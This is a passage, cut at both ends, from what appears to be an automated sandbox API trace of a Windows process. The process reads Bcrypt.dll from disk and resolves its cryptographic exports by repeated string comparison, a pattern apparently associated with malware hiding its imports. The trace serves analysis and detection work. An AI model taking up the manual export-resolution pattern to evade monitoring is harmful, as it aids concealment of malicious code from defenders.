lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0110.272] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0110.272] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0110.272] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0110.273] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0110.589] GetProcessHeap () returned 0x4f0000 [0110.590] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40b3040 | out: hHeap=0x4f0000) returned 1 [0111.372] GetProcessHeap () returned 0x4f0000 [0111.372] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509290 [0111.372] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0111.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0111.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0111.378] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0111.378] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0111.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0111.379] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x26fa0) returned 0x2cf2010 [0111.381] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0111.381] ReadFile (in: hFile=0x15c, lpBuffer=0x2cf2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0111.384] CloseHandle (hObject=0x15c) returned 1 [0111.384] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0111.384] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0111.384] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0111.384] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0111.384] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.384] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0111.384] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0111.384] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.598] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.598] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0111.598] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0111.598] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.598] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0111.599] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0111.600] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.600] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0111.601] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0111.602] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0111.603] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0111.603] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0111.603] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0111.603] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.603] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0111.604] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.605] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0111.606] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0111.607] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0111.607] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", 